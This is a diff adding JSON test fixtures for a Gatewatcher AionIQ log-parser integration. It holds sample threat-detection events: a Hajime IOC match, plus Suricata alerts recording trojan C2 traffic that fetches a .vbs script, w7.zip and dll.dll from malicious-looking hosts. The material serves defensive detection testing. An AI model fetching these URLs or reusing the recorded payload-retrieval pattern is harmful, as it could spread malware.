+    "message": "{\"external_links\":[{\"url\":\"https://urlhaus.abuse.ch/url/2269068/\",\"source_name\":\"URLHaus Abuse.ch\"}],\"relations\":[\"0e3cc27b-7999-48ce-8484-dc12b325a355\"],\"description\":\"IOC matching first tests\",\"event_type\":\"retrohunt\",\"kill_chain_phases\":[],\"timestamp_detected\":\"2023-06-09T14:08:46.845Z\",\"ioc_type\":\"Host\",\"severity\":1,\"community_id\":\"1:x0uuTl0mYnN1nwngep7+A4VH38I=\",\"ioc_creation_date\":\"2023-06-12T10:00:35+00:00\",\"targeted_countries\":[],\"ioc_value\":\"im.a.very.bad.doma.in\",\"dest_ip\":\"2.2.2.2\",\"vulnerabilities\":[],\"matched_event\":\"bd7686c8-20db-427e-941d-844a5ecfe559\",\"risk\":\"Suspicious\",\"uuid\":\"416f35ad-b954-4b6a-a886-987b826bb7f4\",\"meta_data\":{\"ssdeep\":\"1536:87vbq1lGAXSEYQjbChaAU2yU23M51DjZgSQAvcYkFtZTjzBht5:8D+CAXFYQChaAUk5ljnQssL\",\"cwe\":[],\"descriptions\":[],\"tslh\":\"T16D7312E017B517CC1371A8353BED205E9128223972AE35302E97528DF957703BAB2DBE\",\"filetype\":\"ELF 32-bit LSB executable, ARM, EABI5 version 1 (GNU/Linux)\",\"size\":78.3984375,\"usageMode\":\"hunting\"},\"flow_id\":841376349480333,\"matched_event_type\":\"alert\",\"ioc_updated_date\":\"2023-06-12T10:00:35+00:00\",\"targeted_platforms\":[\"linux\"],\"signature\":\"RetroHunt - Host - malware/Unknown - Hajime - GW Lab Test - 00100035-1206-2023-cbf5-08330f0d5bc0\",\"ioc_tags\":[\"trojan.generickd.34055387 (b)\",\"linux/hajime.a trojan\",\"e32/agent.cd\",\"linux.hajime.bc\",\"backdoor.hajime.linux.129\",\"linux/hajime.75930\",\"unix.malware.agent-6626471-0\",\"linux/hajime.nsnlw\",\"hajime\",\"elf.mirai.43048.gc\",\"trojan.elfarm32.hajime.fbhtfi\",\"trojan.linux.hajime\",\"trojan.generickd.34055387\"],\"@version\":\"1\",\"type\":\"cti\",\"targeted_organizations\":[],\"campaigns\":[],\"categories\":[\"malware\"],\"src_port\":55614,\"gcenter\":\"gcenter-xxxxxxxxxxxxxxxxx.domain.local\",\"case_id\":\"00100035-1206-2023-edb6-b38911f8ba0c\",\"dest_port\":80,\"usage_mode\":\"hunting\",\"timestamp_package\":\"2023-06-12T10:00:35.012874+0000\",\"src_ip\":\"1.1.1.1\",\"ttp\":[],\"tlp\":\"green\",\"probability\":0.5,\"gcap\":\"gcap-xxxxxxxxxxxxxxxx.domain.local\",\"@timestamp\":\"2023-06-12T10:12:39.001Z\",\"timestamp_analyzed\":\"2023-06-12T10:12:39.001Z\",\"families\":[\"Hajime\"],\"ioc_id\":\"00100035-1206-2023-cbf5-08330f0d5bc0\",\"targeted_sectors\":[],\"threat_actor\":[\"GW Lab Test\"],\"matched_app_proto\":\"http\"}"
+  }
+}
\ No newline at end of file
diff --git a/GateWatcher/aioniq/tests/sigflow-alert.json b/GateWatcher/aioniq/tests/sigflow-alert.json
new file mode 100644
index 000000000..576a3a270
--- /dev/null
+++ b/GateWatcher/aioniq/tests/sigflow-alert.json
@@ -0,0 +1,14 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Gatewatcher AionIQ",
+        "dialect_uuid": "0825709a-5f76-441e-9dfb-2b5ea6ce551c"
+      }
+    },
+    "message": "{\"event_type\":\"alert\",\"http\":{\"url\":\"/bsb/debugnosso/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Iniciou%20o%20executar%20%20http://65.181.125.193/a35new/w7.zip%7Chttp://65.181.125.193/a35new/w7.zip%7C32%7Chttp://65.181.125.193/a35new/dll.dll\",\"protocol\":\"HTTP/1.1\",\"hostname\":\"www.devyatinskiy.ru\",\"length\":0,\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.690Z\",\"uuid\":\"fd5ba8ea-e263-426d-b4b2-a16521ae09b1\",\"packet_info\":{\"linktype\":1},\"severity\":1,\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"dest_port\":16122,\"@timestamp\":\"2023-03-22T10:44:08.001Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:08.001Z\",\"gcap\":\"gcap-xxxxxxx.domain.local\",\"type\":\"suricata\",\"src_port\":8550,\"metadata\":{\"flowbits\":[\"min.gethttp\",\"ETPROtxtminhead\",\"http.dottedquadhost.dll\"]},\"community_id\":\"1:hEBuGl9msx7YJtg3Tb/+Gf+a1VI=\",\"app_proto\":\"http\",\"packet\":\"kOK6pqSQkOK6pqSRCABFAAC7Uz1AAEAGPT4py4AkHxzgtiFmPvokcIbSnp074oAYAGsSTgAAAQEICmgi0xNoItMTR0VUIC9ic2IvZGVidWdub3Nzby9pbmRleC5waHA/Tj1HTy1HTy1HQURHRVQtUEMtaW5zcGVjdG9yLWdhZGdldCUyMD0lMjAlMjAlMjAlMjBJbmljaWFyJTdCNjklN0QgSFRUUC8xLjENCkhvc3Q6IHd3dy5kZXZ5YXRpbnNraXkucnUNCg0K\",\"proto\":\"TCP\",\"stream\":1,\"flow\":{\"bytes_toclient\":90364,\"bytes_toserver\":3084,\"pkts_toserver\":19,\"pkts_toclient\":66,\"start\":\"2023-03-22T10:25:55.345216+0000\"},\"tx_id\":5,\"ether\":{\"dest_mac\":\"90:e2:ba:a6:a4:90\",\"src_mac\":\"90:e2:ba:a6:a4:91\"},\"payload\":\"R0VUIC9kb3dubG9hZC9RanRHRGx0bWNlLzE2MDgyMDE2dmVjTzdPa0wzeUxQSUNsZW96aWJLRS52YnM/ZHNpZD1ndjVucTMuNDAwYjg2YzcxOTZmOWU4Y2NkZTM1MzcwZWIwYTU0Yjkmc2Jzcj0yZjViMmRmMGFlMGE4Yzc1NTFjN2RmMGJjNDZhOWQ3OTk4MCZsZ2ZwPTMwMDAgSFRUUC8xLjENCkFjY2VwdDogdGV4dC9odG1sLCBhcHBsaWNhdGlvbi94aHRtbCt4bWwsICovKg0KQWNjZXB0LUxhbmd1YWdlOiBlbi1VUw0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBXT1c2NDsgVHJpZGVudC83LjA7IHJ2OjExLjApIGxpa2UgR2Vja28NCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KSG9zdDogZGM1MjQuNHNoYXJlZC5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkNvb2tpZTogZGF5MWhvc3Q9aA0KDQpHRVQgL3dlYi9jZG4vcG9wdWxhci9kb3dubG9hZC9RanRHRGx0bWNlP2NvbnREaXNwPWF0dGFjaG1lbnQlM0IrZmlsZW5hbWUlM0QlMjIxNjA4MjAxNnZlY083T2tMM3lMUElDbGVvemliS0VIYTg2MUh6aDlHRi52YnMlMjIlM0IrZmlsZW5hbWUqJTNEdXRmLTglMjclMjcxNjA4MjAxNnZlY083T2tMM3lMUElDbGVvemliS0VIYTg2MUh6aDlHRi52YnMmY29udFR5cGU9QVBQTElDQVRJT04lMkZPQ1RFVC1TVFJFQU0mY2RuaD03YTc0NTUzYTA1N2VhNTVmYzU2OGI4MGU2MGNkN2ZhMiZkM2M9ZmRzUWp0R0RsdG1jZSUzRElOSVRJQUxJWkVEJTNCK2RvbWFpbiUzRC40c2hhcmVkLmNvbSUzQitleHBpcmVzJTNEV2VkJTJDKzE3LUF1Zy0yMDE2KzAxJTNBMzYlM0E0NCtHTVQlM0IrcGF0aCUzRCUyRiBIVFRQLzEuMQ0KQWNjZXB0OiB0ZXh0L2h0bWwsIGFwcGxpY2F0aW9uL3hodG1sK3htbCwgKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbw0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpDb29raWU6IGRheTFob3N0PWgNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IGNkbmZpbGVzLjRzaGFyZWQuY29tDQoNCkdFVCAvYTM1bmV3L3c3LnR4dCBIVFRQLzEuMQ0KSG9zdDogNjUuMTgxLjEyNS4xOTMNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0KR0VUIC9hMzVuZXcvYXc3LnRpZmYgSFRUUC8xLjENCkhvc3Q6IDY1LjE4MS4xMjUuMTkzDQoNCkdFVCAvYnNiL2luZmVjdHMvaW5kZXgucGhwP049R08tR08tR0FER0VULVBDLWluc3BlY3Rvci1nYWRnZXQlMjA9JTIwJTIwJTIwJTIwV2luZG93cyUyMDclMjBIb21lJTIwUHJlbWl1bSUyMCUyMCUyMCUyMD0lMjAlMjAlMjAlMjAlMjAlMjAlMjBOL0EgSFRUUC8xLjENCkhvc3Q6IHd3dy5kZXZ5YXRpbnNraXkucnUNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0KR0VUIC9ic2IvZGVidWdub3Nzby9pbmRleC5waHA/Tj1HTy1HTy1HQURHRVQtUEMtaW5zcGVjdG9yLWdhZGdldCUyMD0lMjAlMjAlMjAlMjBJbmljaW91JTIwbyUyMGV4ZWN1dGFyJTIwJTIwaHR0cDovLzY1LjE4MS4xMjUuMTkzL2EzNW5ldy93Ny56aXAlN0NodHRwOi8vNjUuMTgxLjEyNS4xOTMvYTM1bmV3L3c3LnppcCU3QzMyJTdDaHR0cDovLzY1LjE4MS4xMjUuMTkzL2EzNW5ldy9kbGwuZGxsIEhUVFAvMS4xDQpIb3N0OiB3d3cuZGV2eWF0aW5za2l5LnJ1DQoNCg==\",\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"payload_printable\":\"GET /download/QjtGDltmce/16082016vecO7OkL3yLPICleozibKE.vbs?dsid=gv5nq3.400b86c7196f9e8ccde35370eb0a54b9&sbsr=2f5b2df0ae0a8c7551c7df0bc46a9d79980&lgfp=3000 HTTP/1.1\\r\\nAccept: text/html, application/xhtml+xml, */*\\r\\nAccept-Language: en-US\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\\r\\nAccept-Encoding: gzip, deflate\\r\\nHost: dc524.4shared.com\\r\\nConnection: Keep-Alive\\r\\nCookie: day1host=h\\r\\n\\r\\nGET /web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F HTTP/1.1\\r\\nAccept: text/html, application/xhtml+xml, */*\\r\\nAccept-Language: en-US\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\\r\\nAccept-Encoding: gzip, deflate\\r\\nCookie: day1host=h\\r\\nConnection: Keep-Alive\\r\\nHost: cdnfiles.4shared.com\\r\\n\\r\\nGET /a35new/w7.txt HTTP/1.1\\r\\nHost: 65.181.125.193\\r\\nConnection: Keep-Alive\\r\\n\\r\\nGET /a35new/aw7.tiff HTTP/1.1\\r\\nHost: 65.181.125.193\\r\\n\\r\\nGET /bsb/infects/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Windows%207%20Home%20Premium%20%20%20%20=%20%20%20%20%20%20%20N/A HTTP/1.1\\r\\nHost: www.devyatinskiy.ru\\r\\nConnection: Keep-Alive\\r\\n\\r\\nGET /bsb/debugnosso/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Iniciou%20o%20executar%20%20http://65.181.125.193/a35new/w7.zip%7Chttp://65.181.125.193/a35new/w7.zip%7C32%7Chttp://65.181.125.193/a35new/dll.dll HTTP/1.1\\r\\nHost: www.devyatinskiy.ru\\r\\n\\r\\n\",\"alert\":{\"signature\":\"ETPRO TROJAN MSIL/Bazidow.A HTTP C2\",\"category\":\"A Network Trojan was detected\",\"gid\":1,\"signature_id\":2828821,\"rev\":3,\"severity\":1,\"metadata\":{\"affected_product\":[\"Windows_XP_Vista_7_8_10_Server_32_64_Bit\"],\"performance_impact\":[\"Moderate\"],\"deployment\":[\"Perimeter\"],\"created_at\":[\"2017_12_07\"],\"updated_at\":[\"2022_05_03\"],\"former_category\":[\"MALWARE\"],\"attack_target\":[\"Client_Endpoint\"],\"signature_severity\":[\"Major\"]},\"action\":\"allowed\"}}"
+  },
+  "expected": {
+    "message": "{\"event_type\":\"alert\",\"http\":{\"url\":\"/bsb/debugnosso/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Iniciou%20o%20executar%20%20http://65.181.125.193/a35new/w7.zip%7Chttp://65.181.125.193/a35new/w7.zip%7C32%7Chttp://65.181.125.193/a35new/dll.dll\",\"protocol\":\"HTTP/1.1\",\"hostname\":\"www.devyatinskiy.ru\",\"length\":0,\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.690Z\",\"uuid\":\"fd5ba8ea-e263-426d-b4b2-a16521ae09b1\",\"packet_info\":{\"linktype\":1},\"severity\":1,\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"dest_port\":16122,\"@timestamp\":\"2023-03-22T10:44:08.001Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:08.001Z\",\"gcap\":\"gcap-xxxxxxx.domain.local\",\"type\":\"suricata\",\"src_port\":8550,\"metadata\":{\"flowbits\":[\"min.gethttp\",\"ETPROtxtminhead\",\"http.dottedquadhost.dll\"]},\"community_id\":\"1:hEBuGl9msx7YJtg3Tb/+Gf+a1VI=\",\"app_proto\":\"http\",\"packet\":\"kOK6pqSQkOK6pqSRCABFAAC7Uz1AAEAGPT4py4AkHxzgtiFmPvokcIbSnp074oAYAGsSTgAAAQEICmgi0xNoItMTR0VUIC9ic2IvZGVidWdub3Nzby9pbmRleC5waHA/Tj1HTy1HTy1HQURHRVQtUEMtaW5zcGVjdG9yLWdhZGdldCUyMD0lMjAlMjAlMjAlMjBJbmljaWFyJTdCNjklN0QgSFRUUC8xLjENCkhvc3Q6IHd3dy5kZXZ5YXRpbnNraXkucnUNCg0K\",\"proto\":\"TCP\",\"stream\":1,\"flow\":{\"bytes_toclient\":90364,\"bytes_toserver\":3084,\"pkts_toserver\":19,\"pkts_toclient\":66,\"start\":\"2023-03-22T10:25:55.345216+0000\"},\"tx_id\":5,\"ether\":{\"dest_mac\":\"90:e2:ba:a6:a4:90\",\"src_mac\":\"90:e2:ba:a6:a4:91\"},\"payload\":\"R0VUIC9kb3dubG9hZC9RanRHRGx0bWNlLzE2MDgyMDE2dmVjTzdPa0wzeUxQSUNsZW96aWJLRS52YnM/ZHNpZD1ndjVucTMuNDAwYjg2YzcxOTZmOWU4Y2NkZTM1MzcwZWIwYTU0Yjkmc2Jzcj0yZjViMmRmMGFlMGE4Yzc1NTFjN2RmMGJjNDZhOWQ3OTk4MCZsZ2ZwPTMwMDAgSFRUUC8xLjENCkFjY2VwdDogdGV4dC9odG1sLCBhcHBsaWNhdGlvbi94aHRtbCt4bWwsICovKg0KQWNjZXB0LUxhbmd1YWdlOiBlbi1VUw0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBXT1c2NDsgVHJpZGVudC83LjA7IHJ2OjExLjApIGxpa2UgR2Vja28NCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KSG9zdDogZGM1MjQuNHNoYXJlZC5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkNvb2tpZTogZGF5MWhvc3Q9aA0KDQpHRVQgL3dlYi9jZG4vcG9wdWxhci9kb3dubG9hZC9RanRHRGx0bWNlP2NvbnREaXNwPWF0dGFjaG1lbnQlM0IrZmlsZW5hbWUlM0QlMjIxNjA4MjAxNnZlY083T2tMM3lMUElDbGVvemliS0VIYTg2MUh6aDlHRi52YnMlMjIlM0IrZmlsZW5hbWUqJTNEdXRmLTglMjclMjcxNjA4MjAxNnZlY083T2tMM3lMUElDbGVvemliS0VIYTg2MUh6aDlHRi52YnMmY29udFR5cGU9QVBQTElDQVRJT04lMkZPQ1RFVC1TVFJFQU0mY2RuaD03YTc0NTUzYTA1N2VhNTVmYzU2OGI4MGU2MGNkN2ZhMiZkM2M9ZmRzUWp0R0RsdG1jZSUzRElOSVRJQUxJWkVEJTNCK2RvbWFpbiUzRC40c2hhcmVkLmNvbSUzQitleHBpcmVzJTNEV2VkJTJDKzE3LUF1Zy0yMDE2KzAxJTNBMzYlM0E0NCtHTVQlM0IrcGF0aCUzRCUyRiBIVFRQLzEuMQ0KQWNjZXB0OiB0ZXh0L2h0bWwsIGFwcGxpY2F0aW9uL3hodG1sK3htbCwgKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbw0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpDb29raWU6IGRheTFob3N0PWgNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IGNkbmZpbGVzLjRzaGFyZWQuY29tDQoNCkdFVCAvYTM1bmV3L3c3LnR4dCBIVFRQLzEuMQ0KSG9zdDogNjUuMTgxLjEyNS4xOTMNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0KR0VUIC9hMzVuZXcvYXc3LnRpZmYgSFRUUC8xLjENCkhvc3Q6IDY1LjE4MS4xMjUuMTkzDQoNCkdFVCAvYnNiL2luZmVjdHMvaW5kZXgucGhwP049R08tR08tR0FER0VULVBDLWluc3BlY3Rvci1nYWRnZXQlMjA9JTIwJTIwJTIwJTIwV2luZG93cyUyMDclMjBIb21lJTIwUHJlbWl1bSUyMCUyMCUyMCUyMD0lMjAlMjAlMjAlMjAlMjAlMjAlMjBOL0EgSFRUUC8xLjENCkhvc3Q6IHd3dy5kZXZ5YXRpbnNraXkucnUNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0KR0VUIC9ic2IvZGVidWdub3Nzby9pbmRleC5waHA/Tj1HTy1HTy1HQURHRVQtUEMtaW5zcGVjdG9yLWdhZGdldCUyMD0lMjAlMjAlMjAlMjBJbmljaW91JTIwbyUyMGV4ZWN1dGFyJTIwJTIwaHR0cDovLzY1LjE4MS4xMjUuMTkzL2EzNW5ldy93Ny56aXAlN0NodHRwOi8vNjUuMTgxLjEyNS4xOTMvYTM1bmV3L3c3LnppcCU3QzMyJTdDaHR0cDovLzY1LjE4MS4xMjUuMTkzL2EzNW5ldy9kbGwuZGxsIEhUVFAvMS4xDQpIb3N0OiB3d3cuZGV2eWF0aW5za2l5LnJ1DQoNCg==\",\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"payload_printable\":\"GET /download/QjtGDltmce/16082016vecO7OkL3yLPICleozibKE.vbs?dsid=gv5nq3.400b86c7196f9e8ccde35370eb0a54b9&sbsr=2f5b2df0ae0a8c7551c7df0bc46a9d79980&lgfp=3000 HTTP/1.1\\r\\nAccept: text/html, application/xhtml+xml, */*\\r\\nAccept-Language: en-US\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\\r\\nAccept-Encoding: gzip, deflate\\r\\nHost: dc524.4shared.com\\r\\nConnection: Keep-Alive\\r\\nCookie: day1host=h\\r\\n\\r\\nGET /web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F HTTP/1.1\\r\\nAccept: text/html, application/xhtml+xml, */*\\r\\nAccept-Language: en-US\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\\r\\nAccept-Encoding: gzip, deflate\\r\\nCookie: day1host=h\\r\\nConnection: Keep-Alive\\r\\nHost: cdnfiles.4shared.com\\r\\n\\r\\nGET /a35new/w7.txt HTTP/1.1\\r\\nHost: 65.181.125.193\\r\\nConnection: Keep-Alive\\r\\n\\r\\nGET /a35new/aw7.tiff HTTP/1.1\\r\\nHost: 65.181.125.193\\r\\n\\r\\nGET /bsb/infects/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Windows%207%20Home%20Premium%20%20%20%20=%20%20%20%20%20%20%20N/A HTTP/1.1\\r\\nHost: www.devyatinskiy.ru\\r\\nConnection: Keep-Alive\\r\\n\\r\\nGET /bsb/debugnosso/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Iniciou%20o%20executar%20%20http://65.181.125.193/a35new/w7.zip%7Chttp://65.181.125.193/a35new/w7.zip%7C32%7Chttp://65.181.125.193/a35new/dll.dll HTTP/1.1\\r\\nHost: www.devyatinskiy.ru\\r\\n\\r\\n\",\"alert\":{\"signature\":\"ETPRO TROJAN MSIL/Bazidow.A HTTP C2\",\"category\":\"A Network Trojan was detected\",\"gid\":1,\"signature_id\":2828821,\"rev\":3,\"severity\":1,\"metadata\":{\"affected_product\":[\"Windows_XP_Vista_7_8_10_Server_32_64_Bit\"],\"performance_impact\":[\"Moderate\"],\"deployment\":[\"Perimeter\"],\"created_at\":[\"2017_12_07\"],\"updated_at\":[\"2022_05_03\"],\"former_category\":[\"MALWARE\"],\"attack_target\":[\"Client_Endpoint\"],\"signature_severity\":[\"Major\"]},\"action\":\"allowed\"}}"
+  }
+}
\ No newline at end of file
diff --git a/GateWatcher/aioniq/tests/sigflow-file.json b/GateWatcher/aioniq/tests/sigflow-file.json
new file mode 100644
index 000000000..baa5139a3
--- /dev/null
+++ b/GateWatcher/aioniq/tests/sigflow-file.json
@@ -0,0 +1,14 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Gatewatcher AionIQ",
+        "dialect_uuid": "0825709a-5f76-441e-9dfb-2b5ea6ce551c"
+      }
+    },
+    "message": "{\"event_type\":\"fileinfo\",\"proto\":\"TCP\",\"http\":{\"protocol\":\"HTTP/1.1\",\"url\":\"/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"hostname\":\"cdnfiles.4shared.com\",\"status\":200,\"length\":1088,\"http_content_type\":\"APPLICATION/OCTET-STREAM\",\"http_user_agent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\",\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.469Z\",\"uuid\":\"24231245-276c-4509-9437-016b82f88c7c\",\"type\":\"suricata\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"@timestamp\":\"2023-03-22T10:44:07.998Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:07.998Z\",\"@version\":\"1\",\"gcap\":\"gcap-xxxxxxxxxx.domain.local\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"fileinfo\":{\"size\":1088,\"filename\":\"16082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs\",\"state\":\"CLOSED\",\"sha256\":\"f31faae778ecfee8e27041309444468a37ad7681d42d7972faa92fe2056721df\",\"magic\":\"Little-endian UTF-16 Unicode text, with CRLF line terminators\",\"sid\":[],\"stored\":false,\"tx_id\":1,\"gaps\":false,\"md5\":\"d526c8e4ad7ab6d80baeb839976b7c80\"},\"dest_port\":8550,\"src_port\":16122,\"app_proto\":\"http\"}"
+  },
+  "expected": {
+    "message": "{\"event_type\":\"fileinfo\",\"proto\":\"TCP\",\"http\":{\"protocol\":\"HTTP/1.1\",\"url\":\"/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"hostname\":\"cdnfiles.4shared.com\",\"status\":200,\"length\":1088,\"http_content_type\":\"APPLICATION/OCTET-STREAM\",\"http_user_agent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\",\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.469Z\",\"uuid\":\"24231245-276c-4509-9437-016b82f88c7c\",\"type\":\"suricata\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"@timestamp\":\"2023-03-22T10:44:07.998Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:07.998Z\",\"@version\":\"1\",\"gcap\":\"gcap-xxxxxxxxxx.domain.local\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"fileinfo\":{\"size\":1088,\"filename\":\"16082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs\",\"state\":\"CLOSED\",\"sha256\":\"f31faae778ecfee8e27041309444468a37ad7681d42d7972faa92fe2056721df\",\"magic\":\"Little-endian UTF-16 Unicode text, with CRLF line terminators\",\"sid\":[],\"stored\":false,\"tx_id\":1,\"gaps\":false,\"md5\":\"d526c8e4ad7ab6d80baeb839976b7c80\"},\"dest_port\":8550,\"src_port\":16122,\"app_proto\":\"http\"}"
+  }
+}
\ No newline at end of file
diff --git a/GateWatcher/aioniq/tests/sigflow-meta.json b/GateWatcher/aioniq/tests/sigflow-meta.json
new file mode 100644
index 000000000..693d7006a
--- /dev/null
+++ b/GateWatcher/aioniq/tests/sigflow-meta.json
@@ -0,0 +1,14 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Gatewatcher AionIQ",
+        "dialect_uuid": "0825709a-5f76-441e-9dfb-2b5ea6ce551c"
+      }
+    },
+    "message": "{\"event_type\":\"http\",\"http\":{\"accept_encoding\":\"gzip, deflate\",\"server\":\"524\",\"accept\":\"text/html, application/xhtml+xml, */*\",\"url\":\"/download/QjtGDltmce/16082016vecO7OkL3yLPICleozibKE.vbs?dsid=gv5nq3.400b86c7196f9e8ccde35370eb0a54b9&sbsr=2f5b2df0ae0a8c7551c7df0bc46a9d79980&lgfp=3000\",\"protocol\":\"HTTP/1.1\",\"hostname\":\"dc524.4shared.com\",\"accept_language\":\"en-US\",\"location\":\"http://cdnfiles.4shared.com/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"length\":0,\"status\":302,\"http_user_agent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\",\"date\":\"Wed, 17 Aug 2016 01:34:43 